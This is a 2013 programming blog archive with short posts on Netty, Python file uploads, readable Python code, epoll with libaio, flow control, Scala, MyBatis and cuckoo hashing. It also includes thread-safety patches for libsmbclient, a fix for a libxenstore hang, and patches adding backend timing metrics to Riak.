Monday, December 30, 2013

Performance analysis of our own full blown HTTP server with Netty 4

In the previous post, Let's do our own full blown HTTP server with Netty 4, you and I were excited about creating our own web server. So far so good. But how good?

Let's do our own full blown HTTP server with Netty 4

Sometimes servlets just don't fit, sometimes you need to support protocols other than HTTP, sometimes you need something really fast. Allow me to show you Netty, which can meet these needs.
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. (http://netty.io/)
Netty has everything one needs for HTTP, so a web server on Netty is low-hanging fruit.
First of all you need to understand what a pipeline is; see Interface ChannelPipeline. A pipeline is like a processing line where various ChannelHandlers convert input bytes into output. A pipeline corresponds one to one to a connection, so in our case the ChannelHandlers will convert an HTTP request into an HTTP response. The handlers are responsible for auxiliary things such as parsing incoming packets and assembling outgoing ones, and also for calling the business logic that handles requests and produces responses.
Full source is available.
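To make the pipeline idea concrete, here is a minimal language-neutral sketch in Python. It is not Netty's API: the names decode_request, handle, encode_response and run_pipeline are hypothetical and exist only for illustration. It shows a chain of handlers turning raw bytes into a request, the request into a response, and the response back into bytes.

```python
# A toy handler pipeline; illustrative only, this is NOT Netty's API.

def decode_request(raw: bytes) -> dict:
    """Parse only the request line of a very simple HTTP request."""
    request_line = raw.split(b"\r\n", 1)[0].decode("ascii")
    method, path, version = request_line.split(" ")
    return {"method": method, "path": path, "version": version}


def handle(request: dict) -> dict:
    """Business logic: produce a response for a request."""
    if request["method"] == "GET" and request["path"] == "/":
        return {"status": 200, "reason": "OK", "body": b"hello"}
    return {"status": 404, "reason": "Not Found", "body": b""}


def encode_response(response: dict) -> bytes:
    """Assemble the outgoing bytes from a response."""
    head = "HTTP/1.1 {} {}\r\nContent-Length: {}\r\n\r\n".format(
        response["status"], response["reason"], len(response["body"]))
    return head.encode("ascii") + response["body"]


# One pipeline per connection: each handler consumes the previous output.
PIPELINE = [decode_request, handle, encode_response]


def run_pipeline(raw: bytes) -> bytes:
    message = raw
    for handler in PIPELINE:
        message = handler(message)
    return message
```

In Netty the handlers are objects attached to a ChannelPipeline and are driven by events rather than by a plain loop, but the division of labour between decoding, business logic and encoding is the same.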

Sunday, December 29, 2013

Python, scalable file uploading

Almost every solution suffers either from dedicating a thread to each client (like Django) or, despite having an event loop on board, from pulling the whole file into memory (like Tornado). That makes it impossible to handle either a large number of clients or big files. We also do not want to delegate file upload completely to some external entity, because we want to make some auth checks before an upload is permitted (otherwise the server can be flooded with unauthorized ingest traffic).
I've borrowed the idea below from Anatoly Mikhailov, see his post Nginx direct file upload without passing them through backend. Let's do this quickly.

Thursday, December 26, 2013

Maintainable python code

The benefit of dynamically typed languages is the ease of writing code; the cost is that the code is harder to understand.
Strongly typed languages such as Haskell and Scala rely on a comprehensive static type system and a compiler that does all the dirty work. At any given point in the code one knows for sure that this particular variable is of this type, that this function has this return type, and so on. So basically one can understand what is going on. In Python with its duck typing one can pass to a function any object that adheres to some contract; this function can pass it further and further, add or remove methods on the fly, and so on. So looking at a piece of code full of variables and function applications, one can barely understand it and loses track of what is going on. A static analyzer can help to some degree, see for instance PySonar, a Deep Static Analyzer for Python:
Treatment of Python’s dynamism. Static analysis for Python is hard because it has many dynamic features. They help make programs concise and flexible, but they also make automated reasoning about Python programs hard. Fortunately, some of these features can be reasonably handled. For example, function or class redefinition can be handled by inferring the effective scope of the old and new definitions. For code that are really undecidable, PySonar uses a universal honest answer: “I don’t know.” Well, not quite so. It attempts to report all known possibilities. For example, if a function is “conditionally defined” (e.g., defined differently in two branches of an if-statement) and the condition is undecidable, then PySonar gives it a union type which contains all possible types it can possibly have. By doing that, PySonar reduces false negative rates.
Sidenote: Scala has duck typing via structural types, but their use is generally not recommended because the implementation relies on reflection, which is slow. Still, Scala structural typing is type safe in contrast to Python, see Structural typing vs. Duck typing.
There is an example of a dynamically typed language that doesn't suffer from the code readability problem - Erlang. One always knows what comes in and what comes out (and, as a result, what is in each line of code). It doesn't have a comprehensive type system apart from records (akin to structs in C). But it has Function Specifications and dialyzer. Unlike in Python, when you call a function in Erlang you pass not an object with encapsulated state and exposed behavior but just plain data; the input data format is defined in the function spec along with the return data format. One doesn't need to pass behavior because it is encapsulated in another lightweight process, the pid of which you may pass within the data. Thanks to this elegant and specific implementation of encapsulation and polymorphism, Erlang solves the readability problem.

So, while PySonar is promising, can one still do something easier and better? Unit tests? Good to have, but covering each function is too much. Docstrings? Too informal. After a while I came across the article Making Wrong Code Look Wrong. I ended up with a simple idea: name each variable and function so that everybody understands what type it has or returns (the same goes for function arguments).
A simple example. Given the following information
user variable has type model.User
userid is a user id, has type int
it is easy to understand what the line below does, independently of where in the code you see it
user = user_by_userid(userid)
If you present this information about variables and functions in some formal way, IDEs and static analyzers can also put warnings on variables that have no such spec and on expressions or statements that just look wrong (see again the article by Joel Spolsky), navigate to type definitions, show variable and function descriptions upon hovering, etc.
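A minimal sketch of the convention is below. The User class stands in for model.User, and the user_by_userid_map storage is a hypothetical stand-in for a real lookup. Type annotations are used here as one possible formal way to state the spec; that choice is my assumption, the naming idea itself does not depend on it.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class User:  # stands in for model.User
    userid: int
    name: str


# The name says it all: a map from userid (int) to User.
user_by_userid_map: Dict[int, User] = {
    1: User(userid=1, name="alice"),
}


def user_by_userid(userid: int) -> Optional[User]:
    """Return the User with the given userid, or None if there is none."""
    return user_by_userid_map.get(userid)


userid = 1
user = user_by_userid(userid)  # reads the same wherever it appears
```

With names like these a reader can guess the types without the annotations, and a tool can check the guess when the annotations are present.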

AIO with epoll event loop

To use libaio with an epoll event loop, use eventfd(2). With eventfd you create a descriptor, add it to epoll to be watched, and hand it to libaio so that libaio signals it when there are completion events. An excerpt from the source is below
if ((afd = eventfd(0, 0)) == -1)
    goto err_end;
...

io_set_eventfd(&iocb, afd);
...

ev.events = EPOLLIN | EPOLLET;
ev.data.ptr = p;
if (epoll_ctl(epollfd, EPOLL_CTL_ADD, afd, &ev) == -1) {
    log_syserr("epoll_ctl");
    goto err_end;
}
Full source is available.

Pipelining and flow control

If you are about to create your own application level protocol on top of TCP in order to load your backend to its limit, you should know how to design such a protocol. Two things that come to mind immediately are pipelining and flow control.
Pipelining is what you get out of the box if you are using a stream based transport layer. Higher level protocols should not throw it away; for instance, HTTP 1.1 supports pipelining. In brief, its purpose is to hide the latency and jitter between client and server.
To see what flow control is, take a look at Akka IO Write models. It gives the server the ability to say "don't push at me, slow down". TCP itself implements flow control too, via the receive window advertised with ACKs.
How to use it? For instance, imagine you have a queue of tasks on the server side that is filled by clients and processed by the backend. If clients send tasks too quickly, the length of the queue grows. One needs to introduce a so-called high watermark and low watermark. If the queue length is greater than the high watermark, stop reading from sockets and the queue length will decrease. When the queue length becomes less than the low watermark, start reading tasks from sockets again.
Note: to make it possible for clients to adapt to the speed at which you process tasks (actually, to adapt the window size), one shouldn't make a big gap between the high and low watermarks. On the other hand, a small gap means you'll add and remove sockets from the event loop too often.
An excerpt from a real project that uses libev is below
//------------------------------------------------------------------

static request_s *request_new(connection_s *con) {
    request_s *new_request;

    new_request = alloc_data(request_mem_mng);
    if (!new_request) {
        log_err("cannot allocate memory");
        goto err;
    }
    memset(new_request, 0, sizeof(request_s));
    
    // Add to connection's list of requests
    list_add_tail(&new_request->request_list, &con->request_list);
    
    new_request->con = con;
    
    {
        // Flow control
        num_reqs++;
        
        if (num_reqs == REQUEST_HIGH_WATERMARK) {
            list_s *elt;
            connection_s *con;
            for (elt = connection_list.next; elt != &connection_list; elt = elt->next) {
                con = list_elt(elt, connection_s, connection_list);
                ev_io_stop(e_loop, &con->read_watcher);
            }
        }
    
    }
    
    return new_request;
err:
    return NULL;
}

//------------------------------------------------------------------

static void request_del(request_s *req) {
    list_del(&req->request_list);
    list_del(&req->request_wait);

    if (req->data)
        free_data(data_mem_mng, req->data);

    free_data(request_mem_mng, req);

    {
        // Flow control
        num_reqs--;
        
        if (num_reqs == REQUEST_LOW_WATERMARK) {
            list_s *elt;
            connection_s *con;
            for (elt = connection_list.next; elt != &connection_list; elt = elt->next) {
                con = list_elt(elt, connection_s, connection_list);
                ev_io_start(e_loop, &con->read_watcher);
            }
        }
    
    }
}
Full source is available.
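The watermark logic itself is independent of libev. Below is a minimal sketch of the same hysteresis in Python; the class name ReadThrottle and its methods are hypothetical, and the places where a real server would stop or start its read watchers are only marked with comments. Like the C excerpt, it switches state exactly when the counter reaches a watermark.

```python
class ReadThrottle:
    """Hysteresis between a high and a low watermark (illustrative sketch)."""

    def __init__(self, high: int, low: int):
        if low >= high:
            raise ValueError("low watermark must be below high watermark")
        self.high = high
        self.low = low
        self.pending = 0      # number of queued requests
        self.reading = True   # are sockets currently watched for reads?

    def request_added(self) -> None:
        self.pending += 1
        if self.reading and self.pending >= self.high:
            # A real server would stop all read watchers here.
            self.reading = False

    def request_done(self) -> None:
        self.pending -= 1
        if not self.reading and self.pending <= self.low:
            # A real server would start all read watchers again here.
            self.reading = True
```

Between the two watermarks the state does not change, which is what keeps the server from toggling watchers on every single request.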

Why Scala

Pros
  1. Scala runs on the JVM - the most mature and trusted VM, which is fast, really fast; on Linux one can make use of mmapped files, epoll, AsynchronousChannel and other stuff. Take a look at the Resin web server, it is fast as hell (by hell I mean nginx; Resin has a bigger memory footprint but can process requests as fast, though a part of Resin is written in C).
  2. Scala can reuse any Java library (and there are many) and run in various Java containers, such as any Servlet/Web Profile container like Resin/Tomcat/Glassfish, or even an OSGi one.
  3. Scala absorbed almost every good thing from the programming languages of the past 40+ years (Lisp - 1958, ML - 1973, Haskell - 1990, Java - 1995). For those who loved type classes in Haskell, Scala has implicits, which are effectively the same beast. And unlike academic languages such as Lisp and Haskell, Scala has a good practical focus.
  4. Scala has the mature and proven Akka framework, which is modeled on Erlang OTP - the best thing for highly available and scalable applications. See Case Studies. You will love supervision trees, distribution of actors among nodes that is transparent to the application, declarative executor configuration, the IO model, etc. Akka IPC is based on Netty, one of the best Java IO frameworks, which even implements its own buffer pool to avoid suffering from GC. Akka also has its own cluster implementation with a gossip protocol on board.
  5. Scala has its own web frameworks like Play and Spray, both on top of Akka.
Cons
  1. Scala is a bit complex. Ideally one needs experience in Java (you'll be using the JVM and Java libs anyway), Haskell (to understand the functional stuff), and Erlang OTP (to properly use actors and reactive programming).
But here is one more pro
  1. You can write an application in Java and start writing some parts in Scala, which makes a smooth transition possible.

Wednesday, December 25, 2013

Good Transfer Object Hierarchy

One approach worked well for me. Allow me to show by example.
class UserTO {
 private Long id;
 ...

 public Long getId() {
  return id;
 }

 public void setId(Long id) {
  this.id = id;
 }
 ...
}

class UserHistoryTO {
 private Long id;
 ...

 public Long getId() {
  return id;
 }

 public void setId(Long id) {
  this.id = id;
 }
 ...
}

class UserDetailsTO extends UserTO {
 private List<UserHistoryTO> userHistory;
 ...

 public List<UserHistoryTO> getUserHistory() {
  return userHistory;
 }

 public void setUserHistory(List<UserHistoryTO> userHistory) {
  this.userHistory = userHistory;
 }
 ...
}
Do you see the point? Ok, whatever.

I'll go with MyBatis

You've worked hard and developed a bunch of persistence capable entities, data objects to hold projections, a good number of JPQL/HQL NamedQueries and a few native SQL queries; optimistic locking is still perfect; you've added OpenEntityManagerInViewFilter because some lazy things do not adhere to transaction demarcation and boundaries; and it works, it works just fine. Then you push it to production, wait a month or so, and open The Slow Query Log. !#@! you think.

I'd advise against JPA/Hibernate, especially when you build something highly scalable and highly available (see Sean Hull's 20 Biggest Bottlenecks That Reduce And Slow Down Scalability, Rule Number 9), and especially when CQRS and Event Sourcing are a big deal. OK, one may believe that programming against a relational database without knowing how to write SQL, or what execution plan will be used to run it, is a good idea as long as you protect yourself with Hibernate. But although Hibernate abstracts the RDB, it doesn't remove the complexity; take a look at the Hibernate ORM documentation. And after all, abstractions are leaky and you'll end up debugging SQL and writing native queries.

But you probably do not want to program in plain JDBC anymore. To make it convenient to work with the DB and let the DB do its job, I'd use MyBatis, which just removes boilerplate code and doesn't introduce any magic. And yes, it is simple, see MyBatis3 Introduction.

To give you a feel for it, here is a really minimalistic example. Mapper xml file src/main/resources/test/persistence/TestMapper.xml
<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN" 
"http://mybatis.org/dtd/mybatis-3-mapper.dtd">

<mapper namespace="test.persistence.TestMapper">

 <select id="selectOne" parameterType="long" resultType="test">
  SELECT
  t.id, t.name
  FROM test t
  WHERE t.id = #{id}
 </select>
</mapper>
Mapper interface src/main/java/test/persistence/TestMapper.java
package test.persistence;

import test.model.Test;

public interface TestMapper {
 Test selectOne(Long id);
}
Transfer object src/main/java/test/model/Test.java
package test.model;

import java.io.Serializable;

public class Test implements Serializable {

 private Long id;

 private String name;

 public Test() {
  super();
 }

 public Long getId() {
  return id;
 }

 public void setId(Long id) {
  this.id = id;
 }

 public String getName() {
  return name;
 }

 public void setName(String name) {
  this.name = name;
 }

}
And a piece of code that makes use of it
try (SqlSession session = sqlSessionFactory.openSession(TransactionIsolationLevel.REPEATABLE_READ)) {
 TestMapper mapper = session.getMapper(TestMapper.class);
 Test res = mapper.selectOne(1L);
 session.commit();
}
So, as you may guess, the mapper interface is implemented by MyBatis with the help of the provided mapper XML file. See MyBatis3 Getting started.

Tuesday, December 24, 2013

Java, ConcurrentSkipListMap

Why is there no ConcurrentTreeMap in Java? Because balanced trees are hard to parallelize, while it is easy to implement a lock-free skip list with the same expected cost of O(log(n)).

If you have no memory but still want hash table

An ordinary hash table has a practical load factor limit below 75%. If you want more, consider Cuckoo hashing: using just three hash functions increases the achievable load to 91%.
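A minimal sketch of the idea in Python follows. The class CuckooSet and all its parameters are hypothetical; the three hash functions are derived by salting Python's built-in hash(), eviction picks a random victim, and keys that still cannot be placed after max_kicks evictions go to a small overflow list (a real implementation would resize or rehash instead). Keys must not be None, because None marks an empty slot.

```python
import random


class CuckooSet:
    """Cuckoo hash set: one table, num_hashes candidate slots per key."""

    def __init__(self, capacity: int, num_hashes: int = 3, max_kicks: int = 500):
        self.slots = [None] * capacity   # None marks an empty slot
        self.num_hashes = num_hashes
        self.max_kicks = max_kicks
        self.stash = []                  # overflow for keys that found no slot
        self.size = 0
        self._rng = random.Random(0)

    def _positions(self, key):
        # Several hash functions obtained by salting the built-in hash().
        return [hash((salt, key)) % len(self.slots)
                for salt in range(self.num_hashes)]

    def __contains__(self, key):
        # A lookup inspects at most num_hashes slots (plus the stash).
        if any(self.slots[p] == key for p in self._positions(key)):
            return True
        return key in self.stash

    def add(self, key) -> bool:
        """Insert key. Returns False if the stash had to be used,
        which signals that the table should be resized."""
        if key in self:
            return True
        self.size += 1
        current = key
        for _ in range(self.max_kicks):
            positions = self._positions(current)
            for p in positions:
                if self.slots[p] is None:
                    self.slots[p] = current
                    return True
            # All candidate slots are taken: evict one occupant,
            # put the current key in its place and re-place the victim.
            victim = self._rng.choice(positions)
            current, self.slots[victim] = self.slots[victim], current
        self.stash.append(current)
        return False

    def load_factor(self) -> float:
        return (self.size - len(self.stash)) / len(self.slots)
```

The price of the high load factor is paid on insertion, where a chain of evictions may be needed; lookups stay cheap because only a fixed number of slots is ever inspected.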

libsmbclient3 and multithreading

If you want to use libsmbclient3 in a process with many threads, you are out of luck.
The first problem is that talloc_stack.c in libsmbclient is not thread safe. It is easy to fix
diff --git a/lib/util/talloc_stack.c b/lib/util/talloc_stack.c
index 8e559cc..b88962b 100644
--- a/lib/util/talloc_stack.c
+++ b/lib/util/talloc_stack.c
@@ -39,6 +39,11 @@
 
 #include "includes.h"
 
+
+#include <pthread.h>
+static pthread_mutex_t mutex_lock = PTHREAD_MUTEX_INITIALIZER;
+
+
 struct talloc_stackframe {
     int talloc_stacksize;
     int talloc_stack_arraysize;
@@ -82,7 +87,12 @@ static struct talloc_stackframe *talloc_stackframe_create(void)
         smb_panic("talloc_stackframe_init malloc failed");
     }
 
-    SMB_THREAD_ONCE(&ts_initialized, talloc_stackframe_init, NULL);
+    SMB_THREAD_LOCK(&mutex_lock);
+    if (!ts_initialized)
+        talloc_stackframe_init(NULL);
+    ts_initialized = true;
+    SMB_THREAD_UNLOCK(&mutex_lock);
+    //SMB_THREAD_ONCE(&ts_initialized, talloc_stackframe_init, NULL);
 
     if (SMB_THREAD_SET_TLS(global_ts, ts)) {
         smb_panic("talloc_stackframe_init set_tls failed");
@@ -118,6 +128,7 @@ static int talloc_pop(TALLOC_CTX *frame)
 static TALLOC_CTX *talloc_stackframe_internal(size_t poolsize)
 {
     TALLOC_CTX **tmp, *top, *parent;
+    if (global_ts == NULL) talloc_stackframe_init(NULL);
     struct talloc_stackframe *ts =
         (struct talloc_stackframe *)SMB_THREAD_GET_TLS(global_ts);
The second problem: the functions set_global_myname() and set_global_myworkgroup() in source3/lib/util_names.c are not thread safe either.
diff --git a/source3/lib/util_names.c b/source3/lib/util_names.c
index bd6e5c1..1d8a96e 100644
--- a/source3/lib/util_names.c
+++ b/source3/lib/util_names.c
@@ -27,17 +27,24 @@
 static char *smb_myname;
 static char *smb_myworkgroup;
 
+#include <pthread.h>
+static pthread_mutex_t mutex_lock = PTHREAD_MUTEX_INITIALIZER;
+
 /***********************************************************************
  Allocate and set myname. Ensure upper case.
 ***********************************************************************/
 
 bool set_global_myname(const char *myname)
 {
+    SMB_THREAD_LOCK(&mutex_lock);
     SAFE_FREE(smb_myname);
     smb_myname = SMB_STRDUP(myname);
-    if (!smb_myname)
+    if (!smb_myname) {
+        SMB_THREAD_UNLOCK(&mutex_lock);
         return False;
+    }
     strupper_m(smb_myname);
+    SMB_THREAD_UNLOCK(&mutex_lock);
     return True;
 }
 
@@ -52,11 +59,15 @@ const char *global_myname(void)
 
 bool set_global_myworkgroup(const char *myworkgroup)
 {
+    SMB_THREAD_LOCK(&mutex_lock);
     SAFE_FREE(smb_myworkgroup);
     smb_myworkgroup = SMB_STRDUP(myworkgroup);
-    if (!smb_myworkgroup)
+    if (!smb_myworkgroup) {
+        SMB_THREAD_UNLOCK(&mutex_lock);
         return False;
+    }
     strupper_m(smb_myworkgroup);
+    SMB_THREAD_UNLOCK(&mutex_lock);
     return True;
 }
What else do you need to know about libsmbclient3 and multithreading? Each context (SMBCCTX) must be used by only one thread at a time. All resources (open files and directories) are bound to a specific context and cannot be used in another one.

libxenstore bug

Open source is perfect until you hit a critical bug. Then you are doomed. OK, just joking. There is a community; in other words, there are a lot of doomed people like you and bugs like this.
An example. There was (and probably still is) a bug in Xen qemu-dm. It can just hang forever under some circumstances. "Some" is the key word here. The first time I saw this was in Xen Opensource 3.4.2. Since qemu-dm is responsible for all the IO of a VM, that VM hangs too.

The problem was in libxenstore that called pthread_cond_wait():
#define condvar_wait(c,m,hnd)   pthread_cond_wait(c,m)

mutex_lock(&h->watch_mutex);

/* Wait on the condition variable for a watch to fire. */
while (list_empty(&h->watch_list))
        condvar_wait(&h->watch_condvar, &h->watch_mutex, h);
msg = list_top(&h->watch_list, struct xs_stored_msg, list);
list_del(&msg->list);

/* Clear the pipe token if there are no more pending watches. */
if (list_empty(&h->watch_list) && (h->watch_pipe[0] != -1))
        while (read(h->watch_pipe[0], &c, 1) != 1)
                continue;
watch_pipe is used to notify select() about events in watch_list. A separate thread writes to this pipe when it adds an element to the list in read_message():
#define condvar_signal(c)       pthread_cond_signal(c)

mutex_lock(&h->watch_mutex);

/* Kick users out of their select() loop. */
if (list_empty(&h->watch_list) &&
    (h->watch_pipe[1] != -1))
        while (write(h->watch_pipe[1], body, 1) != 1)
                continue;

list_add_tail(&msg->list, &h->watch_list);

condvar_signal(&h->watch_condvar);

mutex_unlock(&h->watch_mutex);
It looks OK but it is not. Sometimes select() reports read readiness for watch_pipe[0] while watch_list is empty, and pthread_cond_wait() hangs indefinitely. Relying on that readiness is a big mistake. First, the kernel can give you false positives; second, even if the pipe really contains something to read, another thread can modify the list before you actually read from it.
Having said that, the patch is obvious
diff --git a/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c b/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c
index 11b305d..894e9a5 100644
--- a/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c
+++ b/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c
@@ -953,7 +953,7 @@ void xenstore_process_event(void *opaque)
     char **vec, *offset, *bpath = NULL, *buf = NULL, *drv = NULL, *image = NULL;
     unsigned int len, num, hd_index;
 
-    vec = xs_read_watch(xsh, &num);
+    vec = xs_read_watch_noblock(xsh, &num);
     if (!vec)
         return;
 
diff --git a/xen-3.4.2/tools/xenstore/xs.c b/xen-3.4.2/tools/xenstore/xs.c
index 9707d19..9ce5be6 100644
--- a/xen-3.4.2/tools/xenstore/xs.c
+++ b/xen-3.4.2/tools/xenstore/xs.c
@@ -611,11 +611,11 @@ bool xs_watch(struct xs_handle *h, const char *path, const char *token)
                 ARRAY_SIZE(iov), NULL));
 }
 
-/* Find out what node change was on (will block if nothing pending).
+/* Find out what node change was on.
  * Returns array of two pointers: path and token, or NULL.
  * Call free() after use.
  */
-char **xs_read_watch(struct xs_handle *h, unsigned int *num)
+static char **xs_read_watch_(struct xs_handle *h, unsigned int *num, bool block)
 {
     struct xs_stored_msg *msg;
     char **ret, *strings, c = 0;
@@ -623,9 +623,19 @@ char **xs_read_watch(struct xs_handle *h, unsigned int *num)
 
     mutex_lock(&h->watch_mutex);
 
-    /* Wait on the condition variable for a watch to fire. */
-    while (list_empty(&h->watch_list))
-        condvar_wait(&h->watch_condvar, &h->watch_mutex, h);
+    if (block) {
+        /* Wait on the condition variable for a watch to fire. */
+        while (list_empty(&h->watch_list))
+            condvar_wait(&h->watch_condvar, &h->watch_mutex, h);
+    }
+    else if (list_empty(&h->watch_list)) {
+        /* Clear the pipe token if there are no more pending watches. */
+        if (list_empty(&h->watch_list) && (h->watch_pipe[0] != -1))
+            while (read(h->watch_pipe[0], &c, 1) != 1)
+                continue;
+        mutex_unlock(&h->watch_mutex);
+        return NULL;
+    }
     msg = list_top(&h->watch_list, struct xs_stored_msg, list);
     list_del(&msg->list);
 
@@ -662,6 +672,15 @@ char **xs_read_watch(struct xs_handle *h, unsigned int *num)
     return ret;
 }
 
+char **xs_read_watch(struct xs_handle *h, unsigned int *num)
+{
+    return xs_read_watch_(h, num, true);
+}
+
+char **xs_read_watch_noblock(struct xs_handle *h, unsigned int *num)
+{
+    return xs_read_watch_(h, num, false);
+}
 /* Remove a watch on a node.
  * Returns false on failure (no watch on that node).
  */
diff --git a/xen-3.4.2/tools/xenstore/xs.h b/xen-3.4.2/tools/xenstore/xs.h
index bd36a0b..a921a40 100644
--- a/xen-3.4.2/tools/xenstore/xs.h
+++ b/xen-3.4.2/tools/xenstore/xs.h
@@ -109,6 +109,7 @@ int xs_fileno(struct xs_handle *h);
  * elements. Call free() after use.
  */
 char **xs_read_watch(struct xs_handle *h, unsigned int *num);
+char **xs_read_watch_noblock(struct xs_handle *h, unsigned int *num);
 
 /* Remove a watch on a node: implicitly acks any outstanding watch.
  * Returns false on failure (no watch on that node).
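The essence of the patch, sketched in Python: a readiness notification is only a hint, so the event loop side must use a read that rechecks the list under the lock and returns immediately when it is empty. The class WatchQueue and its methods are hypothetical names, not part of libxenstore.

```python
import threading
from collections import deque


class WatchQueue:
    """Event list guarded by a mutex and a condition variable (sketch)."""

    def __init__(self):
        self._cond = threading.Condition(threading.Lock())
        self._events = deque()

    def put(self, event):
        # Producer side, the counterpart of read_message().
        with self._cond:
            self._events.append(event)
            self._cond.notify()

    def get(self, block=True):
        # block=True mirrors xs_read_watch(); block=False mirrors the
        # xs_read_watch_noblock() variant added by the patch.
        with self._cond:
            if block:
                while not self._events:
                    self._cond.wait()
            elif not self._events:
                return None   # spurious wakeup or list already drained
            return self._events.popleft()
```

An event loop that was woken by select() would call get(block=False) and simply go back to waiting when it receives None.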

Get statistics from Riak

Riak uses folsom_metrics to gather stats. For instance, to obtain timings of GET and PUT operations
erl -name tst -remsh dev1@127.0.0.1 -setcookie riak

(dev1@127.0.0.1)1> folsom_metrics:get_histogram_statistics({riak_kv,node_get_fsm_time}).
[{min,4717},
{max,8996},
{arithmetic_mean,7383.6},
{geometric_mean,7212.3111343349},
{harmonic_mean,7027.752380931542},
{median,7322},
{variance,2550850.2666666666},
{standard_deviation,1597.1381488984184},
{skewness,-0.4278090078808716},
{kurtosis,-1.5957932734122735},
{percentile,[{75,8726},{95,8996},{99,8996},{999,8996}]},
{histogram,[{7317,4},{10717,6},{12717,0}]}]

(dev1@127.0.0.1)2> folsom_metrics:get_histogram_statistics({riak_kv,node_put_fsm_time}).
[{min,6377},
{max,15908},
{arithmetic_mean,11016.857142857143},
{geometric_mean,10642.075761157581},
{harmonic_mean,10268.560398236386},
{median,10245},
{variance,8786965.516483517},
{standard_deviation,2964.281618956525},
{skewness,0.1986125638310398},
{kurtosis,-1.3191900349579302},
{percentile,[{75,14016},{95,14995},{99,15908},{999,15908}]},
{histogram,[{11377,9},{15377,4},{19377,1}]}]
Note
  • all values are in microseconds;
  • stats are kept for the last minute only;
  • data is stored in memory (in ets tables), so the impact on performance is minimal.
There was a task to gather stats about backend speed (leveldb and bitcask). Unfortunately Riak doesn't have such stats. To add them, use the patch below
diff --git a/src/riak_kv_stat.erl b/src/riak_kv_stat.erl
index 6cd5240..cf06de8 100644
--- a/src/riak_kv_stat.erl
+++ b/src/riak_kv_stat.erl
@@ -250,6 +250,8 @@ update1({get_fsm, Bucket, Microsecs, undefined, undefined, PerBucket}) ->
     folsom_metrics:notify_existing_metric({?APP, node_gets}, 1, spiral),
     folsom_metrics:notify_existing_metric({?APP, node_get_fsm_time}, Microsecs, histogram),
     do_get_bucket(PerBucket, {Bucket, Microsecs, undefined, undefined});
+update1({get_vnode, Microsecs}) ->
+    folsom_metrics:notify_existing_metric({?APP, vnode_get_time}, Microsecs, histogram);
 update1({get_fsm, Bucket, Microsecs, NumSiblings, ObjSize, PerBucket}) ->
     folsom_metrics:notify_existing_metric({?APP, node_gets}, 1, spiral),
     folsom_metrics:notify_existing_metric({?APP, node_get_fsm_time}, Microsecs, histogram),
@@ -260,6 +262,8 @@ update1({put_fsm_time, Bucket,  Microsecs, PerBucket}) ->
     folsom_metrics:notify_existing_metric({?APP, node_puts}, 1, spiral),
     folsom_metrics:notify_existing_metric({?APP, node_put_fsm_time}, Microsecs, histogram),
     do_put_bucket(PerBucket, {Bucket, Microsecs});
+update1({put_vnode, Microsecs}) ->
+    folsom_metrics:notify_existing_metric({?APP, vnode_put_time}, Microsecs, histogram);
 update1(read_repairs) ->
     folsom_metrics:notify_existing_metric({?APP, read_repairs}, 1, spiral);
 update1(coord_redir) ->
@@ -370,8 +374,10 @@ stats() ->
      {node_get_fsm_siblings, histogram},
      {node_get_fsm_objsize, histogram},
      {node_get_fsm_time, histogram},
+     {vnode_get_time, histogram},
      {node_puts, spiral},
      {node_put_fsm_time, histogram},
+     {vnode_put_time, histogram},
      {read_repairs, spiral},
      {coord_redirs_total, counter},
      {mapper_count, counter},
diff --git a/src/riak_kv_vnode.erl b/src/riak_kv_vnode.erl
index 0c1d761..8482548 100644
--- a/src/riak_kv_vnode.erl
+++ b/src/riak_kv_vnode.erl
@@ -760,8 +760,12 @@ perform_put({true, Obj},
                      reqid=ReqID,
                      index_specs=IndexSpecs}) ->
     Val = term_to_binary(Obj),
+    StartNow = now(),
     case Mod:put(Bucket, Key, IndexSpecs, Val, ModState) of
         {ok, UpdModState} ->
+            EndNow = now(),
+            Microsecs = timer:now_diff(EndNow, StartNow),
+            riak_kv_stat:update({put_vnode, Microsecs}),
             case RB of
                 true ->
                     Reply = {dw, Idx, Obj, ReqID};
@@ -866,7 +870,12 @@ do_get_term(BKey, Mod, ModState) ->
     end.
 
 do_get_binary({Bucket, Key}, Mod, ModState) ->
-    Mod:get(Bucket, Key, ModState).
+    StartNow = now(),
+    Res = Mod:get(Bucket, Key, ModState),
+    EndNow = now(),
+    Microsecs = timer:now_diff(EndNow, StartNow),
+    riak_kv_stat:update({get_vnode, Microsecs}),
+    Res.
 
 %% @private
 %% @doc This is a generic function for operations that involve
And now
(dev1@127.0.0.1)1> folsom_metrics:get_histogram_statistics({riak_kv,vnode_get_time}).
[{min,1516},
{max,5511},
{arithmetic_mean,3751.9},
{geometric_mean,3486.0111678580415},
{harmonic_mean,3190.229915515953},
{median,3892},
{variance,1879300.7666666668},
{standard_deviation,1370.8759122060126},
{skewness,-0.2710851221084366},
{kurtosis,-1.6493136210655186},
{percentile,[{75,4760},{95,5511},{99,5511},{999,5511}]},
{histogram,[{3816,4},{6516,6},{8516,0}]}]

(dev1@127.0.0.1)2> folsom_metrics:get_histogram_statistics({riak_kv,vnode_put_time}).
[{min,507},
{max,1776},
{arithmetic_mean,952.6428571428571},
{geometric_mean,818.2293396377823},
{harmonic_mean,722.2652885738648},
{median,561},
{variance,317468.09340659337},
{standard_deviation,563.4430702445397},
{skewness,0.5582974538827159},
{kurtosis,-1.7588827239013622},
{percentile,[{75,1615},{95,1759},{99,1776},{999,1776}]},
{histogram,[{1407,9},{2207,5},{3007,0}]}]
Also note that with n_val=3, 1 PUT in Riak equals (1 GET + 1 PUT) * 3 nodes for leveldb/bitcask, and 1 GET in Riak equals 1 GET * 3 nodes for leveldb/bitcask.
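The rule of thumb from the note above can be written down as a tiny helper. The function name backend_ops is hypothetical, and the calculation assumes nothing beyond that rule (every replica is touched, and every PUT reads before it writes).

```python
def backend_ops(riak_gets: int, riak_puts: int, n_val: int = 3) -> dict:
    """Backend (leveldb/bitcask) operations caused by Riak-level operations."""
    return {
        # every Riak GET reads n_val replicas; every Riak PUT also reads first
        "backend_gets": (riak_gets + riak_puts) * n_val,
        # every Riak PUT writes n_val replicas
        "backend_puts": riak_puts * n_val,
    }
```

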